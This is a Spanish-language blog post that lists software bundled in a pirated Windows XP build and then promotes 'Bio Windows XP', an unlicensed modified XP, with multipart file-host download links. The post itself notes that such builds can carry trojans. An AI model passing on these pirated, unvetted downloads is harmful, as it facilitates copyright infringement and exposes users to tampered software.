    1. .Net Framework 1.1 SP1 2. .Net Framework 2 3. Ad-Aware Pro 1.0.6 4. Adobe Reader 7.0.8 (Lite) 5. Alcohol 120% 1.9.6.4719 6. BSPlayer Pro 2.12 Build 941 7. Cleaner 1.36 8. Damn NFO Viewer 9. DVD Shrink 3.2.0.16 10. eMule 0.47c {r3wlx} 11. Everest Ultimate Edition 3.5.761 12. Mozilla Firefox 2.0.0.1 – ahora incluye también Flash & Shockwave 13. Flash 9.0.28.0 y Shockwave 10.1.4.20 14. GMail Drive 1.0.10 15. Google Toolbar 4 16. Image Resizer Powertoy 17. ImageShack QuickLoad 1.0.36 18. Internet Explorer 7 19. Java RE Version 1.6 20. K-Lite Codec Pack 2.81 Full 21. MSN Messenger Live 8 22. Nero Burning Rom 7.5.9.0 23. NOD32 Antivirus System 2.51 24. Microsoft Office 2003 SP2 (actualizado) 25. Picasa 2.6 26. Windows Media Player 11 27. PowerDVD 7.0.2211a Deluxe 28. PuTTY 0.58 29. QuickTime Alternative 1.76 30. Real Alternative 1.51 31. RoboForm 6.8.4 32. Skype 3.0.0.198 33. SpyBot Search & Destroy 1.4 34. Orchestra Sound Scheme 35. TaskSwitchXP Pro 2.0.11 36. TuneUp Utilities 2006 5.3.2343 37. Unlocker 1.8.5 38. uTorrent 1.6 39. Virtual Desktop Manager Powertoy 40. Winamp 5.32 Pro + MMD3 Theme 41. Windows Defender 1.1 42. WinRAR 3.62 + Theme 43. WinSnap 1.1.8 44. XPize 4.6 b1 MCE Lite 45. Yahoo! Instant Messenger 8.1 (sin publicidad)
Antes de despedirme un par de cosas, lo primero de todo que te recomiendo es que si decides descargar alguna de estas versiones piratas de Windows XP desde tu P2P favorito, te instales buenos antivirusanti-spyware y firewall (en algunas ocasiones circulan por estas redes versiones que han sido modificadas por otros usuarios que han instalado virus y troyanos) por lo que más vale prevenir que curar.
Lo segundo es que si conoces alguna otra versión de Windows XP pirata que creas que merezca estar en esta lista no dudes en hacernolo saber en los comentarios.

BIO WINDOWS XP...una alternativa!!!!










Cansado de tu Windows aburrido??? Te molesta que constantemente tengas que "finalizar tarea" porque Windows se ha quedado colgado???? Quisieras cambiar de Sistema Operativodependes de Windows? Te tengo una Solucion.



Su nombre es Bio Windows XP. Este sistema Operativo fue desarrollado por un DJ de musica electronica y hip hop de Barcelona. Suena raro? Como un Dj haria algo que solo un programador podria? Este DJ, en buen dominicano "JARTO DE QUE LA WINDOWS SE LE FRIZARA" comenzo a estudiar, modifico el Kernell, reduciendo el size de peso. Actualmente "biodigitzman" (el creador) ha desarrollado otras aplicaciones y sistemas operativos que son una buena alternativa. Tiene 2 Windows Bio Vista Max y Bio Windows XP (este ultimo es el que he probado y lo recomiendo).


"Bio Windows XP nace de la Union de todos los windows que pude probar en 3 meses. Nació biowindows, es una mezcla de todos los mejores archivos que tenia cada uno y pruebas que hizé integrandole archivos aceleradoress que se usan en windows japoneses,aparte tambien logré integrarle una fantastica pantalla de boot de inicio suavizada que se va acercando mas a las pantallas BOOTFONT que utiliza el nuevo windows vista. Está Version de windows xp sp2 no lleva sp3 , es un formato standard y elevado de un windows xp sp2 Original sin nada quitado pero con sus extras, archivos reemplazados para el mayor desarrollo y rendimiento maximo de un sp2. La estetica y los detalles estan centrados a poder cambiar tu interface todas las veces que quieras , ya que logré integrar el fantastico Windowsblinds 5, una aplicacion que sustituirá en el futuro a los temas a elejir que tienes para cambiar la pìel a tu windows. Windowsblind 5 viene Integrado en Biowindows con 10 fantasticas pieles para que no te aburras de tu windows, integrado tambien tiene animacion, iconos, wallpapers, cursores, quictime 1.67, etc, etc.." Comenta el autor.


DESCARGA BIO WINDOWS XP


QUIERES PROBAR BIO WINDOWS XP???


El que guste, le invito a instalar el Bio Windows XP, claro bajo su propia responsabilidad...que es lo peor que podria pasar??? Tener que formatear y volver a tu aburrido XP de siempre??? jeje


BioWindows_Bullet.part01.rar http://www.mediafire.com/?8oj4modnn4l BioWindows_Bullet.part02.rarhttp://www.mediafire.com/?cytzd1jjjnaBioWindows_Bullet.part03.rar http://www.mediafire.com/?1mmzwxzvifj BioWindows_Bullet.part04.rarhttp://www.mediafire.com/?3zzn2kuo1e3BioWindows_Bullet.part05.rar http://www.mediafire.com/?dmnmmm1ttni BioWindows_Bullet.part06.rarhttp://www.mediafire.com/?6yannlaiynm
Es gratis!!


VISITA LA WEB DEL AUTOR
http://biodigitzman.iblog.com/


Saludos desde lo más profundo de los bytes.